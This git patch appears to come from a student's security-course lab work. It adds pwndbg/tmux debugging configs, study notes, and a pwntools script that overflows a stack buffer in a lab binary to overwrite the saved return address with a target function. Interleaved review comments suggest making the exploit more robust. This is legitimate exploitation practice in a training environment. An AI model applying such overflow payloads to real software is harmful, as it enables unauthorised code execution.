From ef2aeb2e24a23de1781130e57eaebcd9e6decd58 Mon Sep 17 00:00:00 2001
From: Kaushik Narayan R
Date: Thu, 10 Oct 2024 15:09:18 -0700
Subject: [PATCH] lab 4a, got some nice pwndbg layout config

---
 .gdb_split.py | 41 +++++++++++++++++++++++++++++++++++++++++
 .gdbinit | 5 +++++
 4a/lab4a.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++
 Dojo Notes.md | 18 ++++++++++++++++++
 4 files changed, 110 insertions(+)
 create mode 100644 .gdb_split.py
 create mode 100644 .gdbinit
 create mode 100644 4a/lab4a.py

diff --git a/.gdb_split.py b/.gdb_split.py
new file mode 100644
index 0000000..263be8f
--- /dev/null
+++ b/.gdb_split.py
@@ -0,0 +1,41 @@
+import atexit
+import os
+from pwndbg.commands.context import contextoutput, output, clear_screen
+
+bt = (
+    os.popen('tmux split-window -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
+    .read()
+    .strip()
+    .split(":")
+)
+st = (
+    os.popen(
+        f"tmux split-window -h -t {bt[0]} -P -F "
+        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
+    )
+    .read()
+    .strip()
+    .split(":")
+)
+re = (
+    os.popen(
+        f"tmux split-window -h -t {st[0]} -P -F "
+        + '"#{pane_id}:#{pane_tty}" -d "cat -"'
+    )
+    .read()
+    .strip()
+    .split(":")
+)
+di = (
+    os.popen('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -d "cat -"')
+    .read()
+    .strip()
+    .split(":")
+)
+panes = dict(backtrace=bt, stack=st, regs=re, disasm=di)
+for sec, p in panes.items():
+    contextoutput(sec, p[1], True)
+contextoutput("legend", di[1], True)
+atexit.register(
+    lambda: [os.popen(f"tmux kill-pane -t {p[0]}").read() for p in panes.values()]
+)
diff --git a/.gdbinit b/.gdbinit
new file mode 100644
index 0000000..74b8660
--- /dev/null
+++ b/.gdbinit
@@ -0,0 +1,5 @@
+source /opt/pwndbg/gdbinit.py
+set context-stack-lines 20
+set context-sections disasm stack regs backtrace
+source ~/.gdb_split.py
+
diff --git a/4a/lab4a.py b/4a/lab4a.py
new file mode 100644
index 0000000..5e0ed09
--- /dev/null
+++ b/4a/lab4a.py
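Review bot: The four `os.popen('tmux split-window ...')` calls at the top of the hunk never check that tmux is available or that the command succeeded; outside a tmux session `tmux` exits non-zero with empty stdout, `bt` becomes `['']`, and the `contextoutput(sec, p[1], True)` loop then raises IndexError while `.gdbinit` is being sourced, so the rest of the init is lost with an unhelpful traceback. A guard on `TMUX` in the environment plus one helper that runs tmux as an argv list through `subprocess.run(..., check=True)` (import it next to `os`) makes the failure explicit and removes the shell-string interpolation of `bt[0]`/`st[0]`. Two smaller points: `output` and `clear_screen` are imported but never used, and calling the regs pane `re` shadows the stdlib module of that name. The `atexit` cleanup only reads `p[0]` from each pair, so a `(pane_id, pane_tty)` tuple from the helper keeps it working unchanged.
```python
if "TMUX" not in os.environ:
    raise RuntimeError(".gdb_split.py must be sourced from gdb running inside a tmux session")


def _split(*extra):
    """Open a detached tmux pane running `cat -`; return (pane_id, pane_tty)."""
    cmd = ["tmux", "split-window", *extra, "-P", "-F", "#{pane_id}:#{pane_tty}", "-d", "cat -"]
    out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
    pane_id, pane_tty = out.strip().split(":", 1)
    return pane_id, pane_tty


bt = _split()
st = _split("-h", "-t", bt[0])
re = _split("-h", "-t", st[0])
di = _split("-h")
# … unchanged: panes dict, contextoutput calls, atexit cleanup …
```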
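Review bot: `source ~/.gdb_split.py` on the last non-blank line points at the home directory, while the script this commit adds is committed at the repository root as `.gdb_split.py`; the two only coincide if the repo is checked out as `$HOME`, which nothing in the diff shows. Either source it by the same path the repo uses or record the assumption next to the line, e.g. `# assumes this repo is checked out as $HOME; adjust the path otherwise`. Separately, gdb only honours a `.gdbinit` found in the current directory when `auto-load safe-path` allows it, precisely because the file runs arbitrary Python at startup, so anyone cloning this will get a declined-auto-load warning instead of the layout until they whitelist the directory; a one-line comment saying so would save the next person the confusion.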
@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template
+from pwn import *
+
+# Set up pwntools for the correct architecture
+# context.update(arch='i386')
+exe = '/challenge/run'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+io = start()
+
+unbound_buffer = 0x7ffd6f3ab780
+saved_rip = 0x7ffd6f3ab7c8
+offset = saved_rip-unbound_buffer
+
+target_fn = 0x401166
+payload = b'F' * (offset - len('records/')) + p64(target_fn) + b'\n'
+
+io.send(payload)
+io.interactive()
diff --git a/Dojo Notes.md b/Dojo Notes.md
index 0444a43..18cf7f7 100644
--- a/Dojo Notes.md
+++ b/Dojo Notes.md
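Review bot: `unbound_buffer` and `saved_rip` near the bottom of the hunk are absolute stack addresses copied out of one gdb session; under ASLR they are different on every run, and only their difference (0x48) is ever used, so the literals mislead a reader into thinking the exact values matter. Collapse them to the measured distance and say where it came from: `offset = 0x48  # saved RIP - buffer start, measured in gdb; absolute stack addresses vary per run`. `target_fn = 0x401166` is likewise a raw literal; if the target is an exported symbol, `ELF(exe).symbols[...]` documents the intent and survives a rebuild, though the symbol name is not visible here. The `len('records/')` correction suggests the program prepends that string to the input before it lands in the buffer, which deserves a comment since the arithmetic is otherwise opaque. Returning straight into a function can also fault on a 16-byte-aligned SSE instruction if the stack is misaligned on entry, so if the payload crashes inside the target, a `ret` gadget before `target_fn` is the usual fix.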
@@ -356,3 +356,21 @@ done
 ### .15 - blind leading the blind
 
 - basically, stdout and stderr for the child are set to `/dev/null` so instead of spawning root shell, use `cat flag > output` and read output
+
+### .16 - arg wars VI - return of the hacker
+
+- decompiler showed set of filtered characters, quotes and backslashes are not there
+- also .17 checks for backslashes, so i assume backslashes solves this
+- but i got stuck, TA said try the 'prequels' first then come back lol
+
+### lab 4a.1 - easy overflow
+
+- standard buffer overflow vuln
+- gdb shenanigans
+- shift-ctrl-@ inserts a null character it seems (remember for .16)
+- enough gdb, let's move to big guns - pwntools
+- checksec says no stack canary or PIE
+- all g then
+- calculate offset from vulnerable variable location to saved RIP(return instruction pointer) location
+- get address of target function to execute
+- craft payload accordingly